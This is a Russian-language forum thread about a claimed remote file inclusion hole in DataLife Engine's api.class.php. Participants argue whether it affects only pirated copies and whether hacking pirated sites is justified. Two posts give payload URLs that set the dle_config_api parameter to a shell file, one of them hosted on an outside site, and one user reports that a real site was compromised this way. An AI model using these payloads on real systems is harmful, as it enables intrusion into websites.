Перейти к публикации

Рекомендованные сообщения

Воть

http://www.site.ru/engine/api/api.class.php?dle_config_api=[shell.txt?]

Изменено пользователем КиберБулка
Ссылка на сообщение
Поделиться на других сайтах

И что?В чём баг то?

API если его вызвать выдаёт всегда белый лист.

Какой нафиг текст шелла?Вы о чём вообще?

Изменено пользователем IT-Security
Ссылка на сообщение
Поделиться на других сайтах

Что то я также не понял, и причем здесь переменная dle_config_api, ее вообще нет в этом файле.

Ха, увидел где используется dle_config_api, в нелегальных копиях скрипта, ну и ладно нехай их ломают, если подобная уязвимость есть, я даже тестировать ее не буду. Все легальные пользователи могут спать спокойно, у них ничего подобного нет.

Ссылка на сообщение
Поделиться на других сайтах

нашел парочку таких :-D

удивлены, наверное ;)

Толк, то есть? Заняться нечем?;)

Изменено пользователем Captain
Ссылка на сообщение
Поделиться на других сайтах

Да нет, почему.

Если человек целенаправлено ставит себе пиратскую версию - почему бы и не наказать?Какая разница, что писать абузу провайдеру, что написать посередине сайта "Купи лицензию!".

Ссылка на сообщение
Поделиться на других сайтах

Да нет, почему.

Если человек целенаправлено ставит себе пиратскую версию - почему бы и не наказать?Какая разница, что писать абузу провайдеру, что написать посередине сайта "Купи лицензию!".

Тогда этим должны заниматься уполномоченые люди, а не пираты. В данном случае Целсофт должен сделать официальное заявление, что мол пиратки будем целенаправлено ломать. Да и то, я не уверен, что это законно... очень-очень врядли такое законно, уже не говоря о принципах разработчика. ;)

А в данному случае получается "узаконивание" "Щас покажу какой я крутой хакер" <_<

Ссылка на сообщение
Поделиться на других сайтах

В данном случае Целсофт должен сделать официальное заявление, что мол пиратки будем целенаправлено ломать.

Зачем, я позиционирую себя гораздо выше и не собираюсь опускаться до подобных вещей. Иногда мне даже сами доступ дают, просять решить какую либо проблему, а выясняется что у человека нелегальная копия, и тем не менее я не считаю что имею право тут же удалять содержимое сайта. Я в таких случаях лишь информирую, не трогая содержимое. Но это официальная позиция. Неофициальная позиция такая что я не осуждаю тех кто например воспользуется данной уязвимостью и взломает нелегальный софт, если человек использующий ворованный скрипт, считает себя правым нарушать чужие права, то он также должен осознавать что значит такое же право имеют и другие люди, которые могут нарушить его права (эффект бумеранга). Другими словами, к людям нужно относиться так, как ты хочешь чтобы они к тебе относились. Если человек пренебрежительно относится к другим, то он должен быть также готов, что точно также обойдутся когда-нибудь и с ним.

Ссылка на сообщение
Поделиться на других сайтах

Да, именно поэтому я и добавил

уже не говоря о принципах разработчика

Неофициальная позиция такая что я не осуждаю тех кто например воспользуется данной уязвимостью и взломает нелегальный софт

главное, чтобы эту фразу не расценили как "ломайте господа". Т.е. подмена понятий "не осуждаю" с "наказать" :) Вы то как разработчик имеете права "наказывать"...

Изменено пользователем Al-x
Ссылка на сообщение
Поделиться на других сайтах
  • 3 недели спустя...

уязвимость существует для лицензии тоже,вызов идёт:/%20%20//engine/api/api.class.php?dle_config_api=http://www.koreadefence.net/data/shirohige/zfxid.txt?

тоесть не нужно даже в корень пихать,вызов будет сделан через удалённый,у моего друга 8.0 лицензия,вчера взломали так,и всё тянеться к корейским сайтам

Ссылка на сообщение
Поделиться на других сайтах

Жесть, ппц :(

Удалил у себя вообще папку api :(

Ссылка на сообщение
Поделиться на других сайтах

А у тебя нелегальная копия? :rolleyes:

Ссылка на сообщение
Поделиться на других сайтах

Лицензия :)

Ссылка на сообщение
Поделиться на других сайтах

Для слепых повторяю - в ЛИЦЕНЗИОННОЙ ВЕРСИИ DLE этого бага НЕТ!

И не нужно гнать, что у Вашего друга/бабушки/тёти стоит лицензия и его сломали.

Этот файл писал ЛИЧНО Я и никаких параметров туда не ставил!API не работает через метод GET!

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...